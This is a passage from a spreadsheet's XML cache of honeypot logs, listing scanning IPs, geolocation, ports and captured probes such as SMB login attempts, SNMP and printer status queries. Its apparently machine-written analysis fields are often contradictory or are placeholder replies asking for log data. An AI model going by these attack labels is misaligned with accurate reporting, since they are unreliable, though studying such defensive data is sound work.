    <s v="NA&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (45.156.128.66,53448)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'ELGA0'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'BDCK0'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'NGBJ0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CDKP0'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.128.66,37108)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PCAG0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DKHJ0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'BHNL0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JFGC0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PKOA0'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CEGA0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'EFDE0'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:8042"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible attempted unauthorized access to a MySQL database, possibly for exploitation or data theft._x000a_No successful connection made to the service as indicated by &quot;NA&quot; status._x000a_Data extraction or manipulation could be the malicious intent behind this activity. &amp;&amp; No malicious activity is indicated by the log data provided. This suggests that either the services being monitored are inactive or there have been no attempts to access them. &amp;&amp; Unknown connection attempt to PJL service, possibly a scanning or probing activity by an attacker to identify vulnerable services. This could be a precursor to further exploitation of the system. It may indicate a reconnaissance phase of a potential attack. &amp;&amp; No log data provided, unable to analyze malicious activity."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="39"/>
    <x v="39"/>
    <s v="NA&amp;&amp;sh-phx-us-gp1-wk109a.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-30T22:11:10"/>
    <d v="2024-07-02T06:44:00"/>
    <d v="2025-04-30T22:11:10"/>
    <n v="839"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_IRC_H32&amp;&amp;SMA-LAB_IRC_H47&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_PJL_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;1521&amp;&amp;110&amp;&amp;143&amp;&amp;5432&amp;&amp;3389&amp;&amp;80&amp;&amp;6667&amp;&amp;161&amp;&amp;NA&amp;&amp;389&amp;&amp;445&amp;&amp;6379&amp;&amp;23&amp;&amp;36736&amp;&amp;39599"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap PHX"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;query&amp;&amp;request&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMB:Incoming connection (45.156.130.25,45738)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.130.25;rport=48078'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HHAM0'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.130.25,45238)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.130.25;rport=38157'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.130.25,35098)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KGBB0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_RDP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:8219"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This log indicates that there was no activity detected using POP3 protocol, suggesting that an attacker may have attempted to scan or probe for potential vulnerabilities related to this service but did not engage in any malicious behavior. Alternatively, it could be a legitimate user accessing the service successfully and thus the data is marked as NA indicating normal usage. &amp;&amp; The log indicates an attempt to extract printer configuration information, possibly for malicious purposes such as identifying vulnerable devices or gathering sensitive data. This could be a reconnaissance step in a larger attack. The activity suggests the attacker is probing for potential targets to exploit. &amp;&amp; The system is receiving a series of status requests for printer information, which could be a reconnaissance attempt to gather details about the system's printing capabilities. The requests are likely trying to extract sensitive data from the system. This activity may indicate an attempted vulnerability scan or reconnaissance probe. &amp;&amp; There is no malicious activity detected, as there is insufficient log data to analyze. The logs are empty or unavailable."/>
    <s v="Printer Abuse &amp;&amp; Scan Attack _x000a_Printer Attack &amp;&amp; I need log data to analyze. Please provide it."/>
  </r>
  <r>
    <x v="40"/>
    <x v="40"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:10:58"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T22:10:58"/>
    <n v="120"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;53&amp;&amp;56939&amp;&amp;21383&amp;&amp;34422"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Yangpyeong-gun"/>
    <s v="Yangpyeong-gun (Yongmun-myeon)"/>
    <s v="1832832"/>
    <s v="NA"/>
    <s v="37.5197"/>
    <s v="127.588"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b761:bcb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="41"/>
    <x v="41"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:10:26"/>
    <d v="2023-07-25T01:14:40"/>
    <d v="2025-04-30T22:10:26"/>
    <n v="1792"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;32411&amp;&amp;44844&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3589"/>
    <s v="127.115"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:762b:d7e6"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No recent TELNET connection attempts were detected within the monitored period, indicating no immediate malicious activity for this service. _x000a_TELNET connections are typically used to access and manage remote devices but can also be targeted by attackers for unauthorized access._x000a_The absence of any recent TELNET attempts may suggest that this particular attack vector is not currently being targeted by malicious actors. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No malicious activity detected, data for telnet service is unavailable or not applicable. _x000a_Telnet service was either not used or not monitored during the time period of the log._x000a_No unusual connections or activity reported for this service."/>
    <m/>
  </r>
  <r>
    <x v="42"/>
    <x v="42"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:10:24"/>
    <d v="2024-04-17T14:46:24"/>
    <d v="2025-04-30T22:10:24"/>
    <n v="81"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;15000&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="29"/>
    <s v="Gwangju"/>
    <s v="Seo-gu"/>
    <s v="Nongseong-dong"/>
    <s v="8691507"/>
    <s v="502200"/>
    <s v="35.1542"/>
    <s v="126.888"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7628:5829"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze malicious activity._x000a_This suggests that there are no recorded events or attempts detected._x000a_The absence of log data makes it impossible to determine any potential threats. &amp;&amp; No log data provided, unable to analyze."/>
    <s v="I need some log data to analyze! Please provide the log data, and I'll identify the type of attack."/>
  </r>
  <r>
    <x v="43"/>
    <x v="43"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:10:20"/>
    <d v="2025-01-22T17:32:49"/>
    <d v="2025-04-30T22:10:20"/>
    <n v="293"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA&amp;&amp;25545"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PA"/>
    <s v="Pará"/>
    <s v="Redenção"/>
    <s v="Redenção"/>
    <s v="6318107"/>
    <s v="NA"/>
    <s v="-8.02861"/>
    <s v="-50.0314"/>
    <s v="262404"/>
    <s v="JC SERVICOS DE INTERNET LTDA"/>
    <s v="JC SERVICOS DE INTERNET LTDA"/>
    <s v="business"/>
    <s v="Jc Telecom-Filial Conceição"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b124:f4c6"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data is available, so there's nothing to analyze or describe. &amp;&amp; This indicates that there was an attempted connection to a TELNET service, but it did not succeed or was not detected by the monitoring system. No further activity was observed through this method. The attempt may have been abandoned or not malicious in nature. &amp;&amp; No relevant data provided."/>
    <s v="I need the log data to analyze the attacks. Please provide it, and I'll identify the types of attacks accordingly. &amp;&amp; Port scan"/>
  </r>
  <r>
    <x v="44"/>
    <x v="44"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:10:18"/>
    <d v="2024-04-14T15:14:56"/>
    <d v="2025-04-30T22:10:18"/>
    <n v="164"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;33812&amp;&amp;NA&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="69"/>
    <s v="Thái Nguyên Province"/>
    <s v="Thành Phố Thái Nguyên"/>
    <s v="Thái Nguyên"/>
    <s v="1566319"/>
    <s v="NA"/>
    <s v="21.5942"/>
    <s v="105.848"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50222)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,63952)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,64070)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,59167)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,18059)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,63885)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,63987)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,49327)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50131)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,54787)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,55153)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,55373)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,55583)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56009)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56229)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56443)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56690)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56864)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57091)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57486)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57650)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,3751)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50108)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,49551)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,51041)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,52704)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56804)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,58484)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,51024)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,51071)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 